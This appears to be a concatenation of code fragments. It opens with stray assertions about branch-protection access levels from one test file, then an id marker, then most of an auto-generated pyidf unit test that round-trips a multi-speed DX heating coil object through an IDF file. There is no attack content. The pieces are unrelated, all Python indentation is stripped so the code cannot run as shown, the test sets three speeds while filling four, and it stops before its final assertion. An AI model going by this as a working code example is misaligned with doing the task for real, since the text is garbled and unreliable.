assert merge_access_level == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
        assert unprotect_access_level == AccessLevel.MAINTAINER.value
|
11547866
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.coils import CoilHeatingDxMultiSpeed
log = logging.getLogger(__name__)
class TestCoilHeatingDxMultiSpeed(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_coilheatingdxmultispeed(self):
pyidf.validation_level = ValidationLevel.error
obj = CoilHeatingDxMultiSpeed()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_availability_schedule_name = "object-list|Availability Schedule Name"
obj.availability_schedule_name = var_availability_schedule_name
# node
var_air_inlet_node_name = "node|Air Inlet Node Name"
obj.air_inlet_node_name = var_air_inlet_node_name
# node
var_air_outlet_node_name = "node|Air Outlet Node Name"
obj.air_outlet_node_name = var_air_outlet_node_name
# real
var_minimum_outdoor_drybulb_temperature_for_compressor_operation = 5.5
obj.minimum_outdoor_drybulb_temperature_for_compressor_operation = var_minimum_outdoor_drybulb_temperature_for_compressor_operation
# real
var_outdoor_drybulb_temperature_to_turn_on_compressor = 6.6
obj.outdoor_drybulb_temperature_to_turn_on_compressor = var_outdoor_drybulb_temperature_to_turn_on_compressor
# real
var_crankcase_heater_capacity = 0.0
obj.crankcase_heater_capacity = var_crankcase_heater_capacity
# real
var_maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation = 0.0
obj.maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation = var_maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation
# object-list
var_defrost_energy_input_ratio_function_of_temperature_curve_name = "object-list|Defrost Energy Input Ratio Function of Temperature Curve Name"
obj.defrost_energy_input_ratio_function_of_temperature_curve_name = var_defrost_energy_input_ratio_function_of_temperature_curve_name
# real
var_maximum_outdoor_drybulb_temperature_for_defrost_operation = 3.61
obj.maximum_outdoor_drybulb_temperature_for_defrost_operation = var_maximum_outdoor_drybulb_temperature_for_defrost_operation
# alpha
var_defrost_strategy = "ReverseCycle"
obj.defrost_strategy = var_defrost_strategy
# alpha
var_defrost_control = "Timed"
obj.defrost_control = var_defrost_control
# real
var_defrost_time_period_fraction = 0.0
obj.defrost_time_period_fraction = var_defrost_time_period_fraction
# real
var_resistive_defrost_heater_capacity = 0.0
obj.resistive_defrost_heater_capacity = var_resistive_defrost_heater_capacity
# alpha
var_apply_part_load_fraction_to_speeds_greater_than_1 = "Yes"
obj.apply_part_load_fraction_to_speeds_greater_than_1 = var_apply_part_load_fraction_to_speeds_greater_than_1
# alpha
var_fuel_type = "Electricity"
obj.fuel_type = var_fuel_type
# integer
var_region_number_for_calculating_hspf = 3
obj.region_number_for_calculating_hspf = var_region_number_for_calculating_hspf
# integer
var_number_of_speeds = 3
obj.number_of_speeds = var_number_of_speeds
# real
var_speed_1_gross_rated_heating_capacity = 0.0001
obj.speed_1_gross_rated_heating_capacity = var_speed_1_gross_rated_heating_capacity
# real
var_speed_1_gross_rated_heating_cop = 0.0001
obj.speed_1_gross_rated_heating_cop = var_speed_1_gross_rated_heating_cop
# real
var_speed_1_rated_air_flow_rate = 0.0001
obj.speed_1_rated_air_flow_rate = var_speed_1_rated_air_flow_rate
# real
var_speed_1_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_1_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_1_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_1_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 1 Heating Capacity Function of Temperature Curve Name"
obj.speed_1_heating_capacity_function_of_temperature_curve_name = var_speed_1_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_1_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 1 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_1_heating_capacity_function_of_flow_fraction_curve_name = var_speed_1_heating_capacity_function_of_flow_fraction_curve_name
# object-list
var_speed_1_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 1 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_1_energy_input_ratio_function_of_temperature_curve_name = var_speed_1_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_1_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 1 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_1_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_1_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_1_part_load_fraction_correlation_curve_name = "object-list|Speed 1 Part Load Fraction Correlation Curve Name"
obj.speed_1_part_load_fraction_correlation_curve_name = var_speed_1_part_load_fraction_correlation_curve_name
# real
var_speed_1_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_1_rated_waste_heat_fraction_of_power_input = var_speed_1_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_1_waste_heat_function_of_temperature_curve_name = "object-list|Speed 1 Waste Heat Function of Temperature Curve Name"
obj.speed_1_waste_heat_function_of_temperature_curve_name = var_speed_1_waste_heat_function_of_temperature_curve_name
# real
var_speed_2_gross_rated_heating_capacity = 0.0001
obj.speed_2_gross_rated_heating_capacity = var_speed_2_gross_rated_heating_capacity
# real
var_speed_2_gross_rated_heating_cop = 0.0001
obj.speed_2_gross_rated_heating_cop = var_speed_2_gross_rated_heating_cop
# real
var_speed_2_rated_air_flow_rate = 0.0001
obj.speed_2_rated_air_flow_rate = var_speed_2_rated_air_flow_rate
# real
var_speed_2_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_2_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_2_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_2_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 2 Heating Capacity Function of Temperature Curve Name"
obj.speed_2_heating_capacity_function_of_temperature_curve_name = var_speed_2_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_2_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 2 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_2_heating_capacity_function_of_flow_fraction_curve_name = var_speed_2_heating_capacity_function_of_flow_fraction_curve_name
# object-list
var_speed_2_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 2 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_2_energy_input_ratio_function_of_temperature_curve_name = var_speed_2_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_2_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 2 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_2_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_2_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_2_part_load_fraction_correlation_curve_name = "object-list|Speed 2 Part Load Fraction Correlation Curve Name"
obj.speed_2_part_load_fraction_correlation_curve_name = var_speed_2_part_load_fraction_correlation_curve_name
# real
var_speed_2_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_2_rated_waste_heat_fraction_of_power_input = var_speed_2_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_2_waste_heat_function_of_temperature_curve_name = "object-list|Speed 2 Waste Heat Function of Temperature Curve Name"
obj.speed_2_waste_heat_function_of_temperature_curve_name = var_speed_2_waste_heat_function_of_temperature_curve_name
# real
var_speed_3_gross_rated_heating_capacity = 0.0001
obj.speed_3_gross_rated_heating_capacity = var_speed_3_gross_rated_heating_capacity
# real
var_speed_3_gross_rated_heating_cop = 0.0001
obj.speed_3_gross_rated_heating_cop = var_speed_3_gross_rated_heating_cop
# real
var_speed_3_rated_air_flow_rate = 0.0001
obj.speed_3_rated_air_flow_rate = var_speed_3_rated_air_flow_rate
# real
var_speed_3_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_3_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_3_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_3_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 3 Heating Capacity Function of Temperature Curve Name"
obj.speed_3_heating_capacity_function_of_temperature_curve_name = var_speed_3_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_3_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 3 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_3_heating_capacity_function_of_flow_fraction_curve_name = var_speed_3_heating_capacity_function_of_flow_fraction_curve_name
# object-list
var_speed_3_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 3 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_3_energy_input_ratio_function_of_temperature_curve_name = var_speed_3_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_3_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 3 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_3_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_3_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_3_part_load_fraction_correlation_curve_name = "object-list|Speed 3 Part Load Fraction Correlation Curve Name"
obj.speed_3_part_load_fraction_correlation_curve_name = var_speed_3_part_load_fraction_correlation_curve_name
# real
var_speed_3_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_3_rated_waste_heat_fraction_of_power_input = var_speed_3_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_3_waste_heat_function_of_temperature_curve_name = "object-list|Speed 3 Waste Heat Function of Temperature Curve Name"
obj.speed_3_waste_heat_function_of_temperature_curve_name = var_speed_3_waste_heat_function_of_temperature_curve_name
# real
var_speed_4_gross_rated_heating_capacity = 0.0001
obj.speed_4_gross_rated_heating_capacity = var_speed_4_gross_rated_heating_capacity
# real
var_speed_4_gross_rated_heating_cop = 0.0001
obj.speed_4_gross_rated_heating_cop = var_speed_4_gross_rated_heating_cop
# real
var_speed_4_rated_air_flow_rate = 0.0001
obj.speed_4_rated_air_flow_rate = var_speed_4_rated_air_flow_rate
# real
var_speed_4_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_4_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_4_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_4_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 4 Heating Capacity Function of Temperature Curve Name"
obj.speed_4_heating_capacity_function_of_temperature_curve_name = var_speed_4_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_4_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 4 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_4_heating_capacity_function_of_flow_fraction_curve_name = var_speed_4_heating_capacity_function_of_flow_fraction_curve_name
# object-list
var_speed_4_energy_input_ratio_function_of_temperature_curve_name = "object-list|Speed 4 Energy Input Ratio Function of Temperature Curve Name"
obj.speed_4_energy_input_ratio_function_of_temperature_curve_name = var_speed_4_energy_input_ratio_function_of_temperature_curve_name
# object-list
var_speed_4_energy_input_ratio_function_of_flow_fraction_curve_name = "object-list|Speed 4 Energy Input Ratio Function of Flow Fraction Curve Name"
obj.speed_4_energy_input_ratio_function_of_flow_fraction_curve_name = var_speed_4_energy_input_ratio_function_of_flow_fraction_curve_name
# object-list
var_speed_4_part_load_fraction_correlation_curve_name = "object-list|Speed 4 Part Load Fraction Correlation Curve Name"
obj.speed_4_part_load_fraction_correlation_curve_name = var_speed_4_part_load_fraction_correlation_curve_name
# real
var_speed_4_rated_waste_heat_fraction_of_power_input = 0.50005
obj.speed_4_rated_waste_heat_fraction_of_power_input = var_speed_4_rated_waste_heat_fraction_of_power_input
# object-list
var_speed_4_waste_heat_function_of_temperature_curve_name = "object-list|Speed 4 Waste Heat Function of Temperature Curve Name"
obj.speed_4_waste_heat_function_of_temperature_curve_name = var_speed_4_waste_heat_function_of_temperature_curve_name
# alpha
var_zone_name_for_evaporator_placement = "Zone Name for Evaporator Placement"
obj.zone_name_for_evaporator_placement = var_zone_name_for_evaporator_placement
# real
var_speed_1_secondary_coil_air_flow_rate = 0.0001
obj.speed_1_secondary_coil_air_flow_rate = var_speed_1_secondary_coil_air_flow_rate
# real
var_speed_1_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_1_secondary_coil_fan_flow_scaling_factor = var_speed_1_secondary_coil_fan_flow_scaling_factor
# real
var_speed_1_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_1_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_1_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 1 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 1 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
# real
var_speed_2_secondary_coil_air_flow_rate = 0.0001
obj.speed_2_secondary_coil_air_flow_rate = var_speed_2_secondary_coil_air_flow_rate
# real
var_speed_2_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_2_secondary_coil_fan_flow_scaling_factor = var_speed_2_secondary_coil_fan_flow_scaling_factor
# real
var_speed_2_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_2_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_2_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 2 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 2 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
# real
var_speed_3_secondary_coil_air_flow_rate = 0.0001
obj.speed_3_secondary_coil_air_flow_rate = var_speed_3_secondary_coil_air_flow_rate
# real
var_speed_3_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_3_secondary_coil_fan_flow_scaling_factor = var_speed_3_secondary_coil_fan_flow_scaling_factor
# real
var_speed_3_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_3_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_3_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 3 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 3 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
# real
var_speed_4_secondary_coil_air_flow_rate = 0.0001
obj.speed_4_secondary_coil_air_flow_rate = var_speed_4_secondary_coil_air_flow_rate
# real
var_speed_4_secondary_coil_fan_flow_scaling_factor = 0.0001
obj.speed_4_secondary_coil_fan_flow_scaling_factor = var_speed_4_secondary_coil_fan_flow_scaling_factor
# real
var_speed_4_nominal_sensible_heat_ratio_of_secondary_coil = 0.50005
obj.speed_4_nominal_sensible_heat_ratio_of_secondary_coil = var_speed_4_nominal_sensible_heat_ratio_of_secondary_coil
# object-list
var_speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name = "object-list|Speed 4 Sensible Heat Ratio Modifier Function of Temperature Curve Name"
obj.speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name = var_speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name
# object-list
var_speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = "object-list|Speed 4 Sensible Heat Ratio Modifier Function of Flow Fraction Curve Name"
obj.speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name = var_speed_4_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].name, var_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].availability_schedule_name, var_availability_schedule_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].air_inlet_node_name, var_air_inlet_node_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].air_outlet_node_name, var_air_outlet_node_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].minimum_outdoor_drybulb_temperature_for_compressor_operation, var_minimum_outdoor_drybulb_temperature_for_compressor_operation)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].outdoor_drybulb_temperature_to_turn_on_compressor, var_outdoor_drybulb_temperature_to_turn_on_compressor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].crankcase_heater_capacity, var_crankcase_heater_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation, var_maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].defrost_energy_input_ratio_function_of_temperature_curve_name, var_defrost_energy_input_ratio_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].maximum_outdoor_drybulb_temperature_for_defrost_operation, var_maximum_outdoor_drybulb_temperature_for_defrost_operation)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].defrost_strategy, var_defrost_strategy)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].defrost_control, var_defrost_control)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].defrost_time_period_fraction, var_defrost_time_period_fraction)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].resistive_defrost_heater_capacity, var_resistive_defrost_heater_capacity)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].apply_part_load_fraction_to_speeds_greater_than_1, var_apply_part_load_fraction_to_speeds_greater_than_1)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].fuel_type, var_fuel_type)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].region_number_for_calculating_hspf, var_region_number_for_calculating_hspf)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].number_of_speeds, var_number_of_speeds)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_gross_rated_heating_capacity, var_speed_1_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_gross_rated_heating_cop, var_speed_1_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_rated_air_flow_rate, var_speed_1_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_1_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_heating_capacity_function_of_temperature_curve_name, var_speed_1_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_heating_capacity_function_of_flow_fraction_curve_name, var_speed_1_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_energy_input_ratio_function_of_temperature_curve_name, var_speed_1_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_1_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_part_load_fraction_correlation_curve_name, var_speed_1_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_rated_waste_heat_fraction_of_power_input, var_speed_1_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_waste_heat_function_of_temperature_curve_name, var_speed_1_waste_heat_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_gross_rated_heating_capacity, var_speed_2_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_gross_rated_heating_cop, var_speed_2_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_rated_air_flow_rate, var_speed_2_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_2_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_heating_capacity_function_of_temperature_curve_name, var_speed_2_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_heating_capacity_function_of_flow_fraction_curve_name, var_speed_2_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_energy_input_ratio_function_of_temperature_curve_name, var_speed_2_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_2_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_part_load_fraction_correlation_curve_name, var_speed_2_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_rated_waste_heat_fraction_of_power_input, var_speed_2_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_waste_heat_function_of_temperature_curve_name, var_speed_2_waste_heat_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_gross_rated_heating_capacity, var_speed_3_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_gross_rated_heating_cop, var_speed_3_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_rated_air_flow_rate, var_speed_3_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_3_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_heating_capacity_function_of_temperature_curve_name, var_speed_3_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_heating_capacity_function_of_flow_fraction_curve_name, var_speed_3_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_energy_input_ratio_function_of_temperature_curve_name, var_speed_3_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_3_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_part_load_fraction_correlation_curve_name, var_speed_3_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_rated_waste_heat_fraction_of_power_input, var_speed_3_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_waste_heat_function_of_temperature_curve_name, var_speed_3_waste_heat_function_of_temperature_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_gross_rated_heating_capacity, var_speed_4_gross_rated_heating_capacity)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_gross_rated_heating_cop, var_speed_4_gross_rated_heating_cop)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_rated_air_flow_rate, var_speed_4_rated_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_rated_supply_air_fan_power_per_volume_flow_rate, var_speed_4_rated_supply_air_fan_power_per_volume_flow_rate)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_heating_capacity_function_of_temperature_curve_name, var_speed_4_heating_capacity_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_heating_capacity_function_of_flow_fraction_curve_name, var_speed_4_heating_capacity_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_energy_input_ratio_function_of_temperature_curve_name, var_speed_4_energy_input_ratio_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_energy_input_ratio_function_of_flow_fraction_curve_name, var_speed_4_energy_input_ratio_function_of_flow_fraction_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_part_load_fraction_correlation_curve_name, var_speed_4_part_load_fraction_correlation_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_rated_waste_heat_fraction_of_power_input, var_speed_4_rated_waste_heat_fraction_of_power_input)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_waste_heat_function_of_temperature_curve_name, var_speed_4_waste_heat_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].zone_name_for_evaporator_placement, var_zone_name_for_evaporator_placement)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_secondary_coil_air_flow_rate, var_speed_1_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_secondary_coil_fan_flow_scaling_factor, var_speed_1_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_1_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_1_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_1_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_1_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_secondary_coil_air_flow_rate, var_speed_2_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_secondary_coil_fan_flow_scaling_factor, var_speed_2_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_2_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_2_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_2_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_2_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_secondary_coil_air_flow_rate, var_speed_3_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_secondary_coil_fan_flow_scaling_factor, var_speed_3_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_3_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_3_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_3_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name, var_speed_3_sensible_heat_ratio_modifier_function_of_flow_fraction_curve_name)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_secondary_coil_air_flow_rate, var_speed_4_secondary_coil_air_flow_rate)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_secondary_coil_fan_flow_scaling_factor, var_speed_4_secondary_coil_fan_flow_scaling_factor)
self.assertAlmostEqual(idf2.coilheatingdxmultispeeds[0].speed_4_nominal_sensible_heat_ratio_of_secondary_coil, var_speed_4_nominal_sensible_heat_ratio_of_secondary_coil)
self.assertEqual(idf2.coilheatingdxmultispeeds[0].speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name, var_speed_4_sensible_heat_ratio_modifier_function_of_temperature_curve_name)
